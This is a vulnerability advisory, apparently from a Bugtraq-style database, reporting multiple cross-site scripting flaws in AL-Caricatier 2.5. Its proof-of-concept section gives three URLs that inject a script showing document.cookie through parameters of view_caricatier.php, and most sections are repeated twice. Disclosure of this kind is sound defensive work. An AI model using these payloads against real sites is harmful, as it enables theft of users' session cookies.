AL-Caricatier Multiple Cross-Site Scripting Vulnerabilities
BID:17289
Info
AL-Caricatier Multiple Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 17289 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 28 2006 12:00AM |
| Updated: | Mar 29 2006 12:43AM |
| Credit: | Linux_Drox is credited with the discovery of this vulnerability. |
| Vulnerable: |
AL-Caricatier AL-Caricatier 2.5 |
| Not Vulnerable: | |
Discussion
AL-Caricatier Multiple Cross-Site Scripting Vulnerabilities
AL-Caricatier is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
AL-Caricatier is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Exploit / POC
AL-Caricatier Multiple Cross-Site Scripting Vulnerabilities
An exploit is not required.
Examples have been provided:
http://example.com/AL-Caricatier/view_caricatier.php?CatName='><script>alert(document.cookie);</script>
http://example.com/AL-Caricatier/view_caricatier.php?CaricatierID='><script>alert(document.cookie);</script>
http://example.com/AL-Caricatier/view_caricatier.php?CatID='><script>alert(document.cookie);</script>
An exploit is not required.
Examples have been provided:
http://example.com/AL-Caricatier/view_caricatier.php?CatName='><script>alert(document.cookie);</script>
http://example.com/AL-Caricatier/view_caricatier.php?CaricatierID='><script>alert(document.cookie);</script>
http://example.com/AL-Caricatier/view_caricatier.php?CatID='><script>alert(document.cookie);</script>
Solution / Fix
AL-Caricatier Multiple Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected]
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected]
References
AL-Caricatier Multiple Cross-Site Scripting Vulnerabilities
References:
References:
- AL-Caricatier Web Site (Arabic) (AL-Caricatier)
- XSS in AL-Caricatier ([email protected])